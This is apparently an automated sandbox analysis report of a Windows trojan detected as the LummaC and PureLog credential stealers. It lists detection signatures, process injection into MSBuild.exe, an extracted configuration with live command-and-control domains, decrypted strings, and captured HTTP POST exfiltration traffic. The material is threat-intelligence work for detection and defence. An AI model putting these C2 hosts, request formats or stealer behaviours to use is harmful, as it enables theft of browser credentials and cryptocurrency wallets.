Edit tour

Windows Analysis Report
SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe

Overview

General Information

Sample name:	SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe
Analysis ID:	1447065
MD5:	99bba7a8fb2a5f15924d1673cfe3a72b
SHA1:	7c645451ea48d31736f8866781682ef5e192e186
SHA256:	52137b032c46dfa0c74ce28eb0610f22c68a22b6fa2481505b9decdb268d7ae2
Tags:	exe
Infos:

Detection

LummaC, PureLog Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Found malware configuration

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Yara detected AntiVM3

Yara detected LummaC Stealer

Yara detected PureLog Stealer

AI detected suspicious sample

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

Injects a PE file into a foreign processes

LummaC encrypted strings found

Machine Learning detection for sample

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Sigma detected: Silenttrinity Stager Msbuild Activity

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Crypto Currency Wallets

Writes to foreign memory regions

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

PE file contains an invalid checksum

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Searches for user specific document files

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe (PID: 1048 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe" MD5: 99BBA7A8FB2A5F15924D1673CFE3A72B)

MSBuild.exe (PID: 5316 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://darktrace.com/blog/the-rise-of-the-lumma-info-stealer https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-lummac2-94111d4b1e11	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["roomabolishsnifftwk.shop", "civilianurinedtsraov.shop", "stalfbaclcalorieeis.shop", "employhabragaomlsp.shop", "femininiespywageg.shop", "averageaattractiionsl.shop", "buttockdecarderwiso.shop", "museumtespaceorsp.shop", "slamcopynammeks.shop"], "Build id": "RTSCf2--Sunaru"}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000000.1979414026.00000000003F2000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Process Memory Space: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe PID: 1048	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: MSBuild.exe PID: 5316	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: MSBuild.exe PID: 5316	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
0.0.SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe.3f0000.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security

Sigma Signatures

System Summary

Sigma detected: Silenttrinity Stager Msbuild Activity

Source: Network Connection

Author: Kiran kumar s, oscd.community: Data: DestinationIp: 104.21.12.112, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 5316, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49706

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe

Avira: detected

Found malware configuration

Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe.1048.0.memstrmin

Malware Configuration Extractor: LummaC {"C2 url": ["roomabolishsnifftwk.shop", "civilianurinedtsraov.shop", "stalfbaclcalorieeis.shop", "employhabragaomlsp.shop", "femininiespywageg.shop", "averageaattractiionsl.shop", "buttockdecarderwiso.shop", "museumtespaceorsp.shop", "slamcopynammeks.shop"], "Build id": "RTSCf2--Sunaru"}

Multi AV Scanner detection for domain / URL

Source: employhabragaomlsp.shop	Virustotal: Detection: 11%	Perma Link
Source: roomabolishsnifftwk.shop	Virustotal: Detection: 11%	Perma Link
Source: civilianurinedtsraov.shop	Virustotal: Detection: 11%	Perma Link
Source: averageaattractiionsl.shop	Virustotal: Detection: 10%	Perma Link
Source: https://slamcopynammeks.shop:443/api	Virustotal: Detection: 9%	Perma Link
Source: https://slamcopynammeks.shop/api	Virustotal: Detection: 9%	Perma Link
Source: stalfbaclcalorieeis.shop	Virustotal: Detection: 10%	Perma Link
Source: femininiespywageg.shop	Virustotal: Detection: 12%	Perma Link
Source: buttockdecarderwiso.shop	Virustotal: Detection: 11%	Perma Link
Source: museumtespaceorsp.shop	Virustotal: Detection: 10%	Perma Link

Multi AV Scanner detection for submitted file

Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Virustotal: Detection: 65%			Perma Link
Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	ReversingLabs: Detection: 78%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000002.00000002.2115179636.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: roomabolishsnifftwk.shop
Source: 00000002.00000002.2115179636.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: civilianurinedtsraov.shop
Source: 00000002.00000002.2115179636.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: stalfbaclcalorieeis.shop
Source: 00000002.00000002.2115179636.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: employhabragaomlsp.shop
Source: 00000002.00000002.2115179636.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: femininiespywageg.shop
Source: 00000002.00000002.2115179636.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: averageaattractiionsl.shop
Source: 00000002.00000002.2115179636.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: buttockdecarderwiso.shop
Source: 00000002.00000002.2115179636.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: museumtespaceorsp.shop
Source: 00000002.00000002.2115179636.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: slamcopynammeks.shop
Source: 00000002.00000002.2115179636.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000002.00000002.2115179636.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000002.00000002.2115179636.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000002.00000002.2115179636.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000002.00000002.2115179636.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000002.00000002.2115179636.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: RTSCf2--Sunaru

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Code function: 0_2_6CEEDD20 CryptReleaseContext,	0_2_6CEEDD20
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Code function: 0_2_6CEEDEE0 CryptReleaseContext,	0_2_6CEEDEE0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Code function: 0_2_6CEEDE00 CryptGenRandom,__CxxThrowException@8,	0_2_6CEEDE00
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Code function: 0_2_6CEED9D0 CryptAcquireContextA,GetLastError,	0_2_6CEED9D0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Code function: 0_2_6CEEDBB0 CryptAcquireContextA,CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptAcquireContextA,SetLastError,__CxxThrowException@8,	0_2_6CEEDBB0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Code function: 0_2_6CF135E0 CryptReleaseContext,	0_2_6CF135E0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Code function: 0_2_6CEED7F0 CryptReleaseContext,	0_2_6CEED7F0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Code function: 0_2_6CEED7D3 CryptReleaseContext,	0_2_6CEED7D3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_0041592F CryptUnprotectData,	2_2_0041592F

Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.21.12.112:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.12.112:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.12.112:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.12.112:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.12.112:443 -> 192.168.2.5:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.12.112:443 -> 192.168.2.5:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.12.112:443 -> 192.168.2.5:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.12.112:443 -> 192.168.2.5:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.12.112:443 -> 192.168.2.5:49713 version: TLS 1.2

Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\dev\sqlite\dotnet-private\obj\2015\System.Data.SQLite.Linq.2015\Release\System.Data.SQLite.Linq.pdb source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe, 00000000.00000002.1987803598.00000000044CB000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: c:\MyProjects\gitlab\ILProtector\ILProtector\Output2010\Win32\Release\Protect32.pdb source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe, 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmp, SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe, 00000000.00000002.2011062969.00000000067E0000.00000004.08000000.00040000.00000000.sdmp, SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe, 00000000.00000002.2007261960.0000000005839000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe, 00000000.00000002.2007261960.00000000056B1000.00000004.00000800.00020000.00000000.sdmp, Protect544cd51a.dll.0.dr
Source:	Binary string: C:\TFS\tfs06.codeplex.com\PcapDotNet\PcapDotNet\src\PcapDotNet.Packets\obj\Release\PcapDotNet.Packets.pdb source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe, 00000000.00000002.1987803598.00000000044CB000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: c:\MyProjects\gitlab\ILProtector\ILProtector\Output2010\x64\Release\Protect64.pdb source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe, 00000000.00000002.2007261960.00000000058F6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe, 00000000.00000002.2007261960.000000000576B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe, 00000000.00000002.2011062969.000000000689A000.00000004.08000000.00040000.00000000.sdmp

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Code function: 4x nop then jmp 071120DAh	0_2_07112020
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Code function: 4x nop then jmp 071120DAh	0_2_07112028
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h	0_2_071124F0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h	0_2_071124E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then cmp word ptr [edi+eax+02h], 0000h	2_2_00416114
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov ecx, dword ptr [esi+08h]	2_2_004382A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov eax, dword ptr [esi]	2_2_004263C6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov byte ptr [eax], cl	2_2_004263C6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov byte ptr [eax], cl	2_2_004263C6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov eax, dword ptr [esi]	2_2_00427572
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov edx, dword ptr [esp+0000008Ch]	2_2_0041C670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+3Dh]	2_2_004047F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then cmp cl, 0000005Ch	2_2_004028F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h	2_2_00416C59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h	2_2_00416C59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov word ptr [eax], di	2_2_00416C59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h	2_2_00416C59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov word ptr [eax], di	2_2_00416C59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then add esi, 02h	2_2_00414E3A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov word ptr [eax], cx	2_2_00414E3A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov ecx, dword ptr [esi]	2_2_0041CEF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then inc ebx	2_2_004141A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov eax, dword ptr [esi]	2_2_004263D4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov byte ptr [eax], cl	2_2_004263D4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov byte ptr [eax], cl	2_2_004263D4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then lea ebp, dword ptr [esp+03h]	2_2_004243A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov ecx, dword ptr [esp+70h]	2_2_00409440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov ecx, dword ptr [esp+04h]	2_2_0043C470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov eax, dword ptr [esp]	2_2_004374A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 9EDBE8FEh	2_2_004374A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov eax, dword ptr [esp]	2_2_004374A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 9EDBE8FEh	2_2_004374A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then xor eax, eax	2_2_00421570
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov byte ptr [eax], cl	2_2_00421570
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov ecx, dword ptr [esi+08h]	2_2_0043864A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp ecx	2_2_0041C64A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movsx eax, byte ptr [esi+ecx]	2_2_0040C630
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	2_2_00424750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov word ptr [eax], dx	2_2_0042371B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then cmp byte ptr [edx+eax+01h], 00000000h	2_2_0041297F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then cmp dword ptr [edx+ebx*8], A352EDFDh	2_2_0041BA8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp eax	2_2_00413AA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov eax, dword ptr [esp+000001B8h]	2_2_00413BC2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp eax	2_2_00421BD3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov edx, dword ptr [esi]	2_2_00423C0E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 904D52BCh	2_2_0043BC30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov ecx, dword ptr [esi]	2_2_00422D80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then cmp byte ptr [ecx], 00000000h	2_2_00410DA2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	2_2_00432DB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov byte ptr [edi], cl	2_2_00426E7A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov byte ptr [edi], cl	2_2_00426EF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov byte ptr [edi], cl	2_2_00426F4D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx edi, byte ptr [eax+esi]	2_2_00402F50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movsx ebp, byte ptr [eax]	2_2_0043AF50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then push ebx	2_2_00412F59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then xor eax, eax	2_2_00420FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov byte ptr [eax], cl	2_2_00420FE0

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: roomabolishsnifftwk.shop
Source: Malware configuration extractor	URLs: civilianurinedtsraov.shop
Source: Malware configuration extractor	URLs: stalfbaclcalorieeis.shop
Source: Malware configuration extractor	URLs: employhabragaomlsp.shop
Source: Malware configuration extractor	URLs: femininiespywageg.shop
Source: Malware configuration extractor	URLs: averageaattractiionsl.shop
Source: Malware configuration extractor	URLs: buttockdecarderwiso.shop
Source: Malware configuration extractor	URLs: museumtespaceorsp.shop
Source: Malware configuration extractor	URLs: slamcopynammeks.shop

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: slamcopynammeks.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 55Host: slamcopynammeks.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12836Host: slamcopynammeks.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15078Host: slamcopynammeks.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20568Host: slamcopynammeks.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 7089Host: slamcopynammeks.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1258Host: slamcopynammeks.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 585805Host: slamcopynammeks.shop

Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: slamcopynammeks.shop

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: slamcopynammeks.shop

Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe, 00000000.00000002.1987803598.00000000044CB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe, 00000000.00000002.1987803598.00000000044CB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe, 00000000.00000002.1987803598.00000000044CB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe, 00000000.00000002.1987803598.00000000044CB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
